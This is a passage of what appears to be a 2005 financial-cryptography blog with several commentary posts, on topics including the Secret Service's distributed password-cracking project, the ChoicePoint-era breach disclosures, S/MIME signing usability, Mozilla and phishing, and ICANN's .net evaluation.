I'd like to develop the idea of a forum for peer-reviewing papers, introduced in a previous post. To recap, I suggested a sort of pre-publication review circle, which was basically derived from Adam's thoughts on non-academic peer-review.
I've found there are about half a dozen papers out there that would enjoy this process. That's a promising start! Each of these papers lacks the polishing gained by peers, and I know myself that I can get my own thoughts down fairly easily but it takes the critical attention of skeptics to move from muddle to polish.
I think there's a definate need. Here are some trial guidelines, but they are just some notes I jotted down. Comments definately demanded!
Stefan spotted a new patent awarded to Microsoft for a minor variant in blinded signatures, and added to a few other clues, muses that they may be about to launch some privacy system based on Chaumian blinding. I doubt this very much, so I'll get the skepticism up front.
Microsoft does not as a rule experiment with "new stuff" or unproven stuff. Blinded signatures in the marketplace would have to fall into the unproven category. Microsoft's role in society is to absorb borg-like the innovations of other companies, and this would be a step outside that mould. Every other time they've done the innovation thing, it has mucked up on them, and students of innovation know why.
There is a plausible theory that they will use this as a teaser for the marketplace. That would be well and good, certainly blinded signatures in use for any purpose would raise the penny stock of cryptography beyond its current de-listed level. But the real privacy question is in the architecture, and as Stefan pointed out earlier today, the challenge they will face is avoiding being caught in doublespeak, and that goes for internal architecture as much as external marketing.
The following article is quite significant. My comments are at the end so as not to bias reading.
washingtonpost.com
DNA Key to Decoding Human Factor
Secret Service's Distributed Computing Project Aimed at Decoding Encrypted Evidence
By Brian Krebs washingtonpost.com Staff Writer Monday, March 28, 2005; 6:48 AM
For law enforcement officials charged with busting sophisticated financial crime and hacker rings, making arrests and seizing computers used in the criminal activity is often the easy part.
More difficult can be making the case in court, where getting a conviction often hinges on whether investigators can glean evidence off of the seized computer equipment and connect that information to specific crimes.
The wide availability of powerful encryption software has made evidence gathering a significant challenge for investigators. Criminals can use the software to scramble evidence of their activities so thoroughly that even the most powerful supercomputers in the world would never be able to break into their codes. But the U.S. Secret Service believes that combining computing power with gumshoe detective skills can help crack criminals' encrypted data caches.
Taking a cue from scientists searching for signs of extraterrestrial life and mathematicians trying to identify very large prime numbers, the agency best known for protecting presidents and other high officials is tying together its employees' desktop computers in a network designed to crack passwords that alleged criminals have used to scramble evidence of their crimes -- everything from lists of stolen credit card numbers and Social Security numbers to records of bank transfers and e-mail communications with victims and accomplices.
To date, the Secret Service has linked 4,000 of its employees' computers into the "Distributed Networking Attack" program. The effort started nearly three years ago to battle a surge in the number of cases in which savvy computer criminals have used commercial or free encryption software to safeguard stolen financial information, according to DNA program manager Al Lewis.
"We're seeing more and more cases coming in where we have to break encryption," Lewis said. "What we're finding is that criminals who use encryption usually are higher profile and higher value targets for us because it means from an evidentiary standpoint they have more to hide."
Each computer in the DNA network contributes a sliver of its processing power to the effort, allowing the entire system to continuously hammer away at numerous encryption keys at a rate of more than a million password combinations per second.
The strength of any encryption scheme is based largely on the complexity of its algorithm -- the mathematical formula used to scramble the data -- and the length of the "key" required to encode and unscramble the information. Keys consist of long strings of binary numbers or "bits," and generally the greater number of bits in a key, the more secure the encryption.
Many of the encryption programs used widely by corporations and individuals provide up to 128- or 256-bit keys. Breaking a 256-bit key would likely take eons using today's conventional "dictionary" and "brute force" decryption methods -- that is, trying word-based, random or sequential combinations of letters and numbers -- even on a distributed network many times the size of the Secret Service's DNA.
"In most cases, there's a greater probability that the sun will burn out before all the computers in the world could factor in all of the information needed to brute force a 256-bit key," said Jon Hansen, vice president of marketing for AccessData Corp, the Lindon, Utah, company that built the software that powers DNA.
Yet, like most security systems, encryption has an Achilles' heel -- the user. That's because some of today's most common encryption applications protect keys using a password supplied by the user. Most encryption programs urge users to pick strong, alphanumeric passwords, but far too often people ignore that critical piece of advice, said Bruce Schneier, an encryption expert and chief technology officer at Counterpane Internet Security Inc. in Mountain View, Calif.
"Most people don't pick a random password even though they should, and that's why projects like this work against a lot of keys," Schneier said. "Lots of people -- even the bad guys -- are really sloppy about choosing good passwords."
Armed with the computing power provided by DNA and a treasure trove of data about a suspect's personal life and interests collected by field agents, Secret Service computer forensics experts often can discover encryption key passwords.
In each case in which DNA is used, the Secret Service has plenty of "plaintext" or unencrypted data resident on the suspect's computer hard drive that can provide important clues to that person's password. When that data is fed into DNA, the system can create lists of words and phrases specific to the individual who owned the computer, lists that are used to try to crack the suspect's password. DNA can glean word lists from documents and e-mails on the suspect's PC, and can scour the suspect's Web browser cache and extract words from Web sites that the individual may have frequented.
"If we've got a suspect and we know from looking at his computer that he likes motorcycle Web sites, for example, we can pull words down off of those sites and create a unique dictionary of passwords of motorcycle terms," the Secret Service's Lewis said.
DNA was developed under a program funded by the Technical Support Working Group -- a federal office that coordinates research on technologies to combat terrorism. AccessData's various offerings are currently used by nearly every federal agency that does computer forensics work, according to Hansen and executives at Pasadena, Calif.-based Guidance Software, another major player in the government market for forensics technology.
Hansen said AccessData has learned through feedback with its customers in law enforcement that between 40 and 50 percent of the time investigators can crack an encryption key by creating word lists from content at sites listed in the suspect's Internet browser log or Web site bookmarks.
"Most of the time this happens the password is some quirky word related to the suspect's area of interests or hobbies," Hansen said.
Hansen recalled one case several years ago in which police in the United Kingdom used AccessData's technology to crack the encryption key of a suspect who frequently worked with horses. Using custom lists of words associated with all things equine, investigators quickly zeroed in on his password, which Hansen says was some obscure word used to describe one component of a stirrup.
Having the ability to craft custom dictionaries for each suspect's computer makes it exponentially more likely that investigators can crack a given encryption code within a timeframe that would be useful in prosecuting a case, said David McNett, president of Distributed.net, created in 1997 as the world's first general-purpose distributed computing project.
"If you have a whole hard drive of materials that could be related to the encryption key you're trying to crack, that is extremely beneficial," McNett said. "In the world of encrypted [Microsoft Windows] drives and encrypted zip files, four thousand machines is a sizable force to bring to bear."
It took DNA just under three hours to crack one file encrypted with WinZip -- a popular file compression and encryption utility that offers 128-bit and 256-bit key encryption. That attack was successful mainly because investigators were able to build highly targeted word lists about the suspect who owned the seized hard drive.
Other encrypted files, however, are proving far more stubborn.
In a high-profile investigation last fall, code-named "Operation Firewall," Secret Service agents infiltrated an Internet crime ring used to buy and sell stolen credit cards, a case that yielded more than 30 arrests but also huge amounts of encrypted data. DNA is still toiling to crack most of those codes, many of which were created with a formidable grade of 256-bit encryption.
Relying on a word-list approach to crack keys becomes far more complex when dealing with suspects who communicate using a mix of languages and alphabets. In Operation Firewall, for example, several of the suspects routinely communicated online in English, Russian and Ukrainian, as well as a mishmash of the Cyrillic and Roman alphabets.
The Secret Service also is working on adapting DNA to cope with emergent data secrecy threats, such as an increased criminal use of "steganography," which involves hiding information by embedding messages inside other, seemingly innocuous messages, music files or images.
The Secret Service has deployed DNA to 40 percent of its internal computers at a rate of a few PCs per week and plans to expand the program to all 10,000 of its systems by the end of this summer. Ultimately, the agency hopes to build the network out across all 22 federal agencies that comprise the Department of Homeland Security: It currently holds a license to deploy the network out to 100,000 systems.
Unlike other distributed networking programs, such as the Search for Extra Terrestrial Intelligence Project -- which graphically display their number-crunching progress when a host computer's screen saver is activated -- DNA works silently in the background, completely hidden from the user. Lewis said the Secret Service chose not to call attention to the program, concerned that employees might remove it.
"Computer users often experience system lockups that are often inexplicable, and many users will uninstall programs they don't understand," Lewis said. "As the user base becomes more educated with the program and how it functions, we certainly retain the ability to make it more visible."
In the meantime, the agency is looking to partner with companies in the private sector that may have computer-processing power to spare, though Lewis declined to say which companies the Secret Service was approaching. Such a partnership would not endanger the secrecy of their operations, Lewis said, because any one partner would be given only tiny snippets of an entire encrypted message or file.
Distributed.net's McNett said he understands all too well the agency's desire for additional computing power.
"There will be such a thing as 'too much computing power' as soon as you can crack a key 'too quickly,' which is to say 'never' in the Secret Service's case."
© 2005 TechNews.com
So here's my comment. Up until now, we've known that groups like the NSA and GCHQ have had the capability to crunch bigger keys and do better searches. Yet, they are not threats to the world, because their information is kept too secret; they can't reveal their discoveries without risk of losing their edge. Perversely, it doesn't matter whether they can break our crypto, as our secret and their secret is safe with them.
But any policing force is a different matter. The US Secret Service is just another policing agency, one with two missions, being the protection of the currency and the more famous mission of bodyguard. They have no special need to keep their discoveries secret, in fact quite the reverse as they like all policing forces pander to the big bust and the exposure seeking press release. They are by definition threats to the common man.
And, they're talking about cooperating with other departments, both to share data and to share compute resource. Think J Edgar Hoover with a Grid, and it matters not that they are the good guys, it's all about incentives tomorrow, not today's recruitment poster.
In sum, up until now, nobody threatening had access to 10,000 machines. Now they do. Give it another year and I'll bet every large force in the USA and a half dozen ones in other countries will have installed their screen saver style grids. The threats meter has shifted up a few dozen bits for the ordinary person.
(That's the bad news. The good news was that it was a good article.)
Poking around on Ciphire's website I discovered a review by Bruce Schneier on the architecture. It follows on from an earlier one by Russ Housley and Niels Ferguson Here's some meta-comments on the second review.
Firstly, Bruce indicates that the system is vulnerable to an MITM based on the attacker attempting to insert false reply information, and then redirecting the user to email back to an address/key he happens to have. Bruce says this is hard to deal with, but I wonder about that: this is what SSH defends against. If the client can keep track of the certs it has downloaded, surely it should be able to warn of changes, either by history tracking or user labelling (petnames, logos etc). Indeed, it seems that a lot of the other later attacks can be dealt with by not trusting the PKI every time it says "trust me."
Secondly, Bruce talks about the insider code injection attack. Yes, tough one. Publishing the code the code - which Ciphire have indicated they will do - helps there, and as mentioned this is _necessary but not sufficient_ as eyeballs are limited even then.
But there are further steps that will be left undone - Open Sourcing, Open Standards and Open Compeittion. Open source walks hand in hand with open standards. And open standards encourage competing implementations. Here, we see the often bitter and twisted relationship between the PGP Inc and GnuPG teams - which we cheer and applaud as while they are fighting each other, their code is getting better and better and more and more secure.
No such luck for Ciphire; even when they publish the source, it would take a masochist of maniacal proportions to download it, print it and start reading it. I well remember Lucky Green walking into HIP with boxes and boxes of PGP source. And I do mean boxes, a figure of 20 sticks in my mind and I have no idea why. A team of about a dozen of us worked for about 2 days flat out to finish the last 1% of the errors in the source scanning. And we didn't have time to dally on this comment or that buffer overflow...
So Ciphire aren't going to see as much benefit from the publication of their source as they might hope, but for all that it certainly adds to the confidence if they do publish.
Thirdly, what's the _security signal_ with posted reviews? Well, it's all well and good that someone famous did a review. That's presumably for money, and any crypto guy knows you get what you pay for. That's grand, but what strikes is not the review, but the problems found. Problems were found - see above - and Ciphire still printed the review!
So I propose a new signal: disclosure of own shortfalls, weaknesses, attacks. As Ciphire has gone ahead and published a critique with lines of attack within it, they've drawn out the worst that can happen to them. This does more than just give slashdotters something to get excited over, it actually tells the world where the security stops. That's a valuable thing.
Some people swear by them. Others think they are just paper. What are they really? I am minded to the Stigler observation, that, paraphrased, all certifications are eventually taken over by their stakeholders. Here is a Register article that bemoans one such certification dropping its practical test, and reducing it to boot camp / brain dump status.
I have no certifications, and I can declare myself clearly on this: it would be uneconomic for my own knowledge to obtain one. Frankly, it is always better to study something you know little of (like an MBA) than something you already know a lot of (like how to build a payment system, the pinnacle of security problems because unlike other areas, you are guaranteed to have real threats) .
I recently looked at CISSP (as described in the above article). With some hope, I downloaded their PDF, after tentatively signing my life away because of their fear of revealing their deepest security secrets to some potential future student. Yet what was in the PDF was ... less than in any reasonable half-dozen articles in any net rag with security in their name. Worse, the PDF finishes with a 2 or 3 page list of references with no organisation and no hope of anyone reading or even finding more than a few of them.
So in contrast to what today's article suggests, CISSP is already set up to be a funnel for revenue purposes. When a certification draws you in to purchase the expensive training materials then you know that they are on the road to degree mills, simply because they now no longer have a single security goal. Now they have a revenue incentive ... It's only a matter of time before they forget their original purpose.
Which all leads to the other side of the coin - if an employer is impressed by your certification, then that employer hasn't exactly thought it through. Not so impressive in return; do you really want to do security work for an organisation that has already reduced their security process to one of borrowing other organisations's best practices? (Which leads to the rather difficult question of how to identify an organisation that thinks for itself in security matters. Another difficult problem in security signalling!)
So what does an employer do to find out if someone knows any security? How does an _individual_ signal to the world that he or she knows something about the subject? Another question, another day!
Rarely does anyone bother to sit down and ponder why the world is so crazy, and ask why those people over the other side are so different. Asking questions is anathema to the times we live in, and I have living proof of that - I occasionally throw out completely unbelievable statements and rarely if ever am I asked about them. I'm told, I'm challenged, and I'm damned. But never asked...
So it is with some surprise that an American (!) has sat down and thought about why Europeans email the way they do, and why Americans email the way they do. A thoughtful piece. Once you've read it, I'd encourage you to try something different: ask a question, try and work out the answer.
(Oh, and the relevance to Financial Cryptography is how people communicate and don't communicate, where communication is the meta-problem that FC is trying to solve. Thanks to Jeroen to pointer... And for a more amusing perspective on asking questions, try Dilbert)
Euromail
What Germans can teach us about e-mail.
By Eric Weiner
Posted Friday, March 25, 2005, at 4:17 AM PT
North America and Europe are two continents divided by a common technology: e-mail. Techno-optimists assure us that e-mail—along with the Internet and satellite TV—make the world smaller. That may be true in a technical sense. I can send a message from my home in Miami to a German friend in Berlin and it will arrive almost instantly. But somewhere over the Atlantic, the messages get garbled. In fact, two distinct forms of e-mail have emerged: Euromail and Amerimail.
Amerimail is informal and chatty. It's likely to begin with a breezy "Hi" and end with a "Bye." The chances of Amerimail containing a smiley face or an "xoxo" are disturbingly high. We Americans are reluctant to dive into the meat of an e-mail; we feel compelled to first inform hapless recipients about our vacation on the Cape which was really excellent except the jellyfish were biting and the kids caught this nasty bug so we had to skip the whale watching trip but about that investors' meeting in New York. ... Amerimail is a bundle of contradictions: rambling and yet direct; deferential, yet arrogant. In other words, Amerimail is America.
Euromail is stiff and cold, often beginning with a formal "Dear Mr. X" and ending with a brusque "Sincerely." You won't find any mention of kids or the weather or jellyfish in Euromail. It's all business. It's also slow. Your correspondent might take days, even weeks, to answer a message. Euromail is also less confrontational in tone, rarely filled with the overt nastiness that characterizes American e-mail disagreements. In other words, Euromail is exactly like the Europeans themselves. (I am, of course, generalizing. German e-mail style is not exactly the same as Italian or Greek, but they have more in common with each other than they do with American mail.)
These are more than mere stylistic differences. Communication matters. Which model should the rest of the world adopt: Euromail or Amerimail?
A California-based e-mail consulting firm called People-onthego sheds some light on the e-mail divide. It recently asked about 100 executives on both sides of the Atlantic whether they noticed differences in e-mail styles. Most said yes. Here are a few of their observations:
"Americans tend to write (e-mails) exactly as they speak."
"Europeans are less obsessive about checking e-mail."
"In general, Americans are much more responsive to email—they respond faster and provide more information."
One respondent noted that Europeans tend to segregate their e-mail accounts. Rarely do they send personal messages on their business accounts, or vice versa. These differences can't be explained merely by differing comfort levels with technology. Other forms of electronic communication, such as SMS text messaging, are more popular in Europe than in the United States.
The fact is, Europeans and Americans approach e-mail in a fundamentally different way. Here is the key point: For Europeans, e-mail has replaced the business letter. For Americans, it has replaced the telephone. That's why we tend to unleash what e-mail consultant Tim Burress calls a "brain dump": unloading the content of our cerebral cortex onto the screen and hitting the send button. "It makes Europeans go ballistic," he says.
Susanne Khawand, a German high-tech executive, has been on the receiving end of American brain dumps, and she says it's not pretty. "I feel like saying, 'Why don't you just call me instead of writing five e-mails back and forth,' " she says. Americans are so overwhelmed by their bulging inboxes that "you can't rely on getting an answer. You don't even know if they read it." In Germany, she says, it might take a few days, or even weeks, for an answer, but one always arrives.
Maybe that's because, on average, Europeans receive fewer e-mails and spend less time tending their inboxes. An international survey of business owners in 24 countries (conducted by the accounting firm Grant Thornton) found that people in Greece and Russia spend the least amount of time dealing with e-mail every day: 48 minutes on average. Americans, by comparison, spend two hours per day, among the highest in the world. (Only Filipinos spend more time on e-mail, 2.1 hours.) The survey also found that European executives are skeptical of e-mail's ability to boost their bottom line.
It's not clear why European and American e-mail styles have evolved separately, but I suspect the reasons lie within deep cultural differences. Americans tend to be impulsive and crave instant gratification. So we send e-mails rapid-fire, and get antsy if we don't receive a reply quickly. Europeans tend to be more methodical and plodding. They send (and reply to) e-mails only after great deliberation.
For all their Continental fastidiousness, Europeans can be remarkably lax about e-mail security, says Bill Young, an executive vice president with the Strickland Group. Europeans are more likely to include trade secrets and business strategies in e-mails, he says, much to the frustration of their American colleagues. This is probably because identity theft—and other types of hacking—are much less of a problem in Europe than in the United States. Privacy laws are much stricter in Europe.
So, which is better: Euromail or Amerimail? Personally, I'm a convert—or a defector, if you prefer—to the former. I realize it's not popular these days to suggest we have anything to learn from Europeans, but I'm fed up with an inbox cluttered with rambling, barely cogent missives from friends and colleagues. If the alternative is a few stiffly written, politely worded bits of Euromail, then I say … bring it on.
Thanks to Pierre Khawand for research assistance.
Eric Weiner is a correspondent for NPR's Day to Day program.
Article URL: http://slate.msn.com/id/2115223/
Until recently, security breaches were generally hushed up. A California law (SB1386) to notify victims of losses of identity information came into effect mid 2002, which had the effect of springing a mandated leak in the secrecy of breaches across corporate and government USA.
At first a steady trickle of smaller breaches garnered minor press attention. Then Choicepoint burst into the public consciousness in February of 2005 due to several factors. This major breach caused not only a major dip in the company's share price, but also triggered the wave of similar revelations (see ID theft is inescapable below for a long list).
Such public exposure of breaches is unprecedented. Either we have just observed a spike in actual breaches and this is truly Mad March, or the breaches are normal, but the disclosure is abnormal.
Anecdotal evidence in the security industry supports the latter theory. (One example.) We've always known that massive breaches were happening, as stories have persistently circulated in security circles ever since companies started hooking databases to Internet servers. I feel pretty darn safe in putting the finger on SB1386 and Choicepoint as having changed the way things are now done (and, not to forget Schechter and Smith's FC03 paper which argued for more disclosure).
(Editorial note: this is posted because I need a single reference to the list of disclosures, rather than a squillion URLs. As additional disclosures come in I might simply add them to the list. For a comprehensive list of posts, see Adam's Choicepoint category. Adam also points at David Fraser's list of privacy incidents. And another list.)
By Thomas C Greene in Washington
Published Wednesday 23rd March 2005 12:29 GMT
March 2005 might make history as the apex of identity theft disclosures. Privacy invasion outfit ChoicePoint, payroll handler PayMaxx, Bank of America, Lexis Nexis, several universities, and a large shoe retailer called DSW all lost control of sensitive data concerning millions of people.
Credit card and other banking details, names, addresses, phone numbers, Social Security numbers, and dates of birth have fallen into the hands of potential identity thieves. The news could not be worse.
In March 2005 alone:
California State University at Chico notified 59,000 students, faculty, and staff that their details had been kept on a computer compromised by remote intruders. The haul included names, addresses and Social Security numbers.
Boston College notified 120,000 of its alumni after a computer containing their addresses and Social Security numbers were compromised by an intruder.
Shoe retailer DSW notified more than 100,000 customers of a remote break-in of the company's computerized database of 103 of the chain's 175 stores.
Privacy invasion outfit Seisint, a contributor to the MATRIX government dossier system, now owned by Reed Elsiver, confessed to 32,000 individuals that its Lexis Nexis databases had been compromised.
Privacy invasion outfit ChoicePoint confessed to selling the names, addresses and Social Security numbers of more than 150,000 people to criminals.
Bank of America confessed to losing backup tapes containing the financial records of 1.2 million federal employees.
Payroll outsourcer PayMaxx foolishly exposed more than 25,000 of its customers' payroll records on line.
Desktop computers belonging to government contractor Science Applications International Corp (SAIC) were stolen, exposing the details of stockholders past and present, many of them heavy hitters in the US government, such as former Defense Secretaries William Perry and Melvin Laird, former CIA Director John Deutch, former CIA Deputy Director Bobby Ray Inman, former Chief Weapons Inspector in Iraq David Kay, and former chief counter-terror advisor General Wayne Downing.
Cell phone provider T-Mobile admitted that an intruder gained access to 400 of its customers' personal information.
George Mason University confessed that a remote intruder had gained access to the personal records of 30,000 students, faculty, and staff.
To which we can add:Department of Homeland Security's Transportation Security Administration, Northwestern University's Kellogg School of Management, Nevada's Department of Motor Vehicles, legal data collector Westlaw, University of Nevada , University of California, Berkeley.
My first foray into S/MIME is ongoing. I say "ongoing" because I've completed the 3rd attempt to get it going without success and now have signing going!. The first was with the help of one of CACert's experts, and within 10 minutes or so of massive clicking around, I had a cert installed in my Thunderbird.
10 minutes to create a cert is total failure right there. There should be ONE button and it should take ONE second. No excuses. The notion that I need a cert to tell other people who I am - people who already know me - is so totally off the charts there are no words to describe. None that are polite anyway.
(Actually, there shouldn't even be a button, it should be created when the email account is created! Thanks to Julien for that observation.)
Anyway, to be a crypto scribbler these days one has to have an open mind to all cryptosystems, no matter who designed them, so I plough on with the project to get S/MIME working. No matter how long it takes. Whip me again, please.
There are three further signing problems with S/MIME I've seen today, beyond the lack of the button to make it work.
Firstly, it seems that the key exchage is based on signed messages. The distribution of your public key only happens when you sign a message! Recalling yesterday's recommendation for S/MIME signing (do not sign messages unless you know what that means) this represents a barrier to deployment. The workaround is to send nonsense signed messages to people who you want to communicate with, but to otherwise turn signing off. Techies will say that's just stoopid, but consider this: It's just what your lawyer would say, and you don't want to be the first one to feel really stoopid in front of the judge.
Secondly, Daniel says that implementations first encrypt a message and sign it. That means that to show that a message is signed, you must de-sign it *and* decrypt it in one operation. As only the owner has the key to decrypt, only the owner can show it is signed! Dispute resolution is looking messy, even buggy. How can anyone be sure that that a signed message is indeed signed if there are layers separating message from signature? The RFC says:
In general, the best strategy is to "be liberal in what you receive and conservative in what you send"
Which might be good advice in Gnuland, but is not necessarily the best security advice. (I think Dan Bernstein said this.) Further, this puts the application in a big dilemma. To properly look after messages, they should be decrypted and then re-encrypted within the local database using the local keys. Otherwise the message is forever dependent on that one cert, right?! (Revoke the cert, revoke all messages?)
But if the message is decrypted, the signature is lost, so the signature can only ever form part of a message integrity function. Luckily, the RFC goes on to say that one can sign and encrypt in any order, so this would seem to be an implementation issue
That's good news. And (thirdly) it also takes the edge off of the RFC's suggestion that signatures are non-repudiable. FCers know well that humans repudiate, and dumb programs can't do a darn thing about it.
In a paper (sorry, PDF only) last month at FC05, Garfinkel and friends reported on an interesting survey conducted in two communities of merchants, one which received signed email from a supplier, and one which did not. This was an unusual chance to test two groups distinguished by usage of a crypto tool.
The biggest result to my mind is that users simply didn't as a body understand what the signed emails were all about. Even though these merchants were dealing with valuable transactions, the group that was receiving signed email only did a little better than the control group in knowing it (33% as opposed to 20%). This is a confusion that I'd expect, I recently installed a good cert into my Thunderbird and I still cannot send out signed or encrypted email using S/MIME (I forget why).
It's a very valuable survey, and welcome addition to the work of Ping, Friedman, et al, and of course Simson Garfinkel's thesis. I've copied the Conclusion below as anyone involved with email or user security should be aware of how real systems meet real users.
But there is one area where I take exception at. Garfinkel el al believe that commercial entities "should immediately adopt the practice of digitally-signing their mail to customers with S/MIME signatures using a certificate signed by a widely-published CA such as VeriSign."
Strongly Disagree! As there is nothing in the paper that indicates the meaning of a digital signature, this is a bad recommendation. Are they asking merchants to take on unlimited liability? Is this a simply a protection against forged emails? Or a checksum against network corruption? Without some thought as to what it is the merchant is promising, I'd recommend that signing be left off.
(Encryption, on the other hand, is fine. We can never have enough encryption. But this survey didn't cover that.)
Views, Reactions and Impact of Digitally-Signed Mail in e-Commerce
Abstract.We surveyed 470 Amazon.com merchants regarding their experience, knowledge and perceptions of digitally-signed email. Some of these merchants (93) had been receiving digitally-signed VAT invoices from Amazon for more than a year. Respondents attitudes were measured as to the role of signed and/or sealed mail in e-commerce. Among our findings: 25.2% of merchants thought that receipts sent by online merchants should be digitally-signed, 13.2% thought they should be sealed with encryption, and 33.6% thought that they should be both signed and sealed. Statistically-significant differences between merchants who had received the signed mail and those who had not are noted. We conclude that Internet-based merchants should send digitally-signed email as a best practice, even if they think that their customers will not understand the signatures, on the grounds that today s email systems handle such signatures automatically and the passive exposure to signatures appears to increase acceptance and trust.
4 Conclusions and Policy Implications
We surveyed hundreds of people actively involved in the business of e-commerce as to their views on and experience with digitally-signed email. Although they had not received prior notification of the fact, some of these individuals had been receiving digitally-signed email for more than a year. To the best of our knowledge this is the first survey of its kind
It is widely believed that people will not use cryptographic techniques to protect email unless it is extraordinarily easy to use. We showed that even relatively unsophisticated computer users who do not send digitally-signed mail nevertheless believe that it should be used to protect the email that they themselves are sending (and to a lesser extent, receiving as well).
We believe that digitally-signed mail could provide some measure of defense against phishing attacks. Because attackers may try to obtain certificates for typo or copycat names, we suggest that email clients should indicate the difference between a certificate that had been received many times and one that is being received for the first time much in the way that programs implementing the popular SSH protocol [15] alert users when a host key has changed.
We found that the majority (58.5%) of respondents did not know whether or not the program that they used to read their mail handled encryption, even though the vast majority (81.1%) use such mail clients. Given this case, companies that survey their customers as to whether or not the customers have encryption-capable mail readers are likely to yield erroneous results.
We learned that digitally-signed mail tends to increase the recipient s trust in the email infrastructure.We learned that despite more than a decade of confusion over multiple standards for secure email, there are now few if any usability barriers to receiving mail that s digitally-signed with S/MIME signatures using established CAs.
Finally, we found that people with no obvious interest in selling or otherwise promoting cryptographic technology believe that many email messages sent today without protection should be either digitally-signed, sealed with encryption, or both.
The complete survey text with simple tabulations of every question and all respondent comments for which permission was given to quote is at http://www.simson.net/smime-survey.html.
4.1 Recommendations
We believe that financial organizations, retailers, and other entities doing business on the Internet should immediately adopt the practice of digitally-signing their mail to customers with S/MIME signatures using a certificate signed by a widely-published CA such as VeriSign. Software for processing such messages is widely deployed. As one of our respondents who identified himself as a very sophisticated computer user wrote:
I use PGP, but in the several years since I have installed it I have never used it for encrypting email, or sending signed email. I have received and verified signed email from my ISP. I have never received signed email from any other source (including banks, paypal, etc, which are the organisations I would have thought would have gained most from its use).
Given that support for S/MIME signatures is now widely deployed, we also believe that existing mail clients and webmail systems that do not recognize S/MIME-signed mail should be modified to do so. Our research shows that there is significant value for users in being able to verify signatures on signed email, even without the ability to respond to these messages with mail that is signed or sealed.
We also believe that existing systems should be more lenient with mail that is digitally-signed but which fails some sort of security check. For example, Microsoft Outlook and Outlook Express give a warning if a message is signed with a certificate that has expired, or if a certificate is signed by a CA that is not trusted. We believe that such warnings only confuse most users; more useful would be a warning that indicates when there is a change in the distinguished name of a correspondent or even when the sender s signing key changes indicating a possible phishing attack.
Adam points to an essay by Paul Graham on A Unified Theory of VC Suckage. Sure, I guess, and if you like learning how and why, read it and also Adam's comments. Meanwhile, I'll just leave you with this amusing footnote:
[2] Since most VCs aren't tech guys, the technology side of their due diligence tends to be like a body cavity search by someone with a faulty knowledge of human anatomy. After a while we were quite sore from VCs attempting to probe our nonexistent database orifice.No, we don't use Oracle. We just store the data in files. Our secret is to use an OS that doesn't lose our data. Which OS? FreeBSD. Why do you use that instead of Windows NT? Because it's better and it doesn't cost anything. What, you're using a freeware OS?
How many times that conversation was repeated. Then when we got to Yahoo, we found they used FreeBSD and stored their data in files too.
Flat files rule.
(It turns out that the term of art for "we just use files on FreeBSD" is flat files. They are much more common than people would admit, especially among old timers who've got that "been there, done that" experience of seeing their entire database puff into smoke because someone plugged in a hair dryer or the latest security patch just blew away access to that new cryptographic filesystem with journalling mirrored across 2 continents, a cruise liner and a nuclear bunker. Flat files really do rule OK. Anyway, back to debugging my flat file database ...)
Over at Mozilla, the honeymoon is definately over, as no less than Symantec's CEO casts some doubt on the notion that just because a browser is popular and open source doesn't mean it's secure. The full story. There is one weak comment from Mitchell Baker, of Mozilla, that is easy to dispose of:
"There is this idea that market share alone will make you have more vulnerabilities," Baker said. "It is not relational at all."
That's, um, slightly wrong. You create the vulnerabilities, and market share finds 'em. We can show it empirically, logically or economically, you pick. Not to worry. Now, I have a fond hope that Mozilla can show the way ahead in phishing, being open source and all that, but this has got me totally bemused:
In general, classic code flaws tend to be fairly easy to fix once they are found, she said. More difficult problems to guard against are the ones that exploit human behavior, like phishing."In some of these cases, the solution is very difficult to determine," she said. "There are some circumstances where the speed won't be as fast."
In barely disguised politeness, I have to question this. While I'm happy that phishing is belatedly on the table, what does it mean that the solution is difficult to determine?
If there is a question of how to handle phishing, then ask?! We've been talking about fixing phishing for an entire YEAR now on Mozilla's very crypto and security groups. There are bugs filed, there are no shortage of clues planted. Keyboards have smoked with the volume of emails, posts, and documents. GOOD ideas on fixing phishing will flood in faster than you can say "go-fish". There are at least two, maybe 3 or 4 completely coded up solutions running in Mozilla already! Today!
What's difficult about it all? Maybe it hasn't been said today. Here's how to do it: download trustbar.mozdev.org and do that.
Couldn't be simpler.
Maybe there's hope for Microsoft yet .. they are reported as saying nothing at all about IE 7.0 security upgrades for phishing.
There's no hope for Sun.
They recently announced yet another set of licences (1 2 3) still lumbered with the core requirement of making it difficult to share Java. Lack of shareability makes porting the language to platforms a Sisyphean task. As open source volunteers slave at the onerous and unpaid task of getting compilers bootstrapped and working, they cannot release their binary results; so each unpaid volunteer is locked into pushing their own stone up the hill until somone pays the Sun Gods to let them join together and push up one stone.
The time taken to push Java from new release source through installed binary and then start getting some packages out to the users is about the same time as the gap between major releases. There is rarely a time where the users on open source platforms feel the language is stable, hardly a reward for adoption. The stone rolls down again, and Sun are trapped in the eternal punishment of their "Write once, Run twice" arrogance.
Over at Mozilla, the luster of the unknown is rapidly tarnishing off Firefox. Here's an article by someone who bothered to go looking at the security. Conclusion? More of the same.
Following on from the Choicepoint debacle, two of America's banking regulators, the FDIC and the OCC - have decided that financial institutions must warn customers of security breaches [1]. t seems that 6% of America's bank customers have already sent their banks a similar message.
I checked in to ICANN to see if there was any news on the .net TLD since Adam and I wrote in some comments on conflict of interest, and lo and behold, there is! Not on the results, but on the process. ICANN has engaged Telcordia as an independent advisor to lead a team of DNS experts in evaluating the 5 contenders.
"Telcordia's Dr. David Sincoskie will lead a team that possesses 270 years of collective industry experience, with particular emphasis in networks, information databases, security and operations. Evaluation team demographics include two IEEE Fellows; a member of the National Academy of Engineering; a multi-cultural/multi-national composition, with nationals of Croatia, Greece, Pakistan, Taiwan, the UK and the US. In addition, 60% of the team possesses PhDs, spanning CS, EE and Economics;"
Heavy hitting!
It certainly makes sense to engage an independent team to do this evaluation, especially given the bitchy environment and the underlying challenge to the US Department of Commerce's benevolent dictatorship. This could give new meaning to the process; taking it into an era of open governance.
Some questions remain - it's not that easy to get scored on open governance. Who are Telcordia, and why are they independent? ICANN is again one step ahead there (are you shocked already?) and has published an "Advisory Regarding Neutrality of Independent Evaluators:"
"Telcordia Technologies is a wholly-owned subsidiary of Science Applications International Corporation (SAIC). Previously known as Bellcore, on November 17, 1997 SAIC acquired Bellcore and renamed the company Telcordia Technologies."
Bellcore! Related to the old AT&T Bell Labs? Or the System V guys? Well that should be just the ticket.
But wait, who are they owned by? SAIC? Now there's a problem. If you had to pick any player who was even more locked into Beltway politics than VeriSign, it would be SAIC. So, notwithstanding that half of the disclosure is full of reasons why SAIC has nothing to do with this deal, that's a matter of concern. On the watch list.
On balance we are still within the realms of open governance. ICANN have published their disclosure, and the more uncomfortable the disclosure is, the more valuable it becomes. That leaves three open questions:
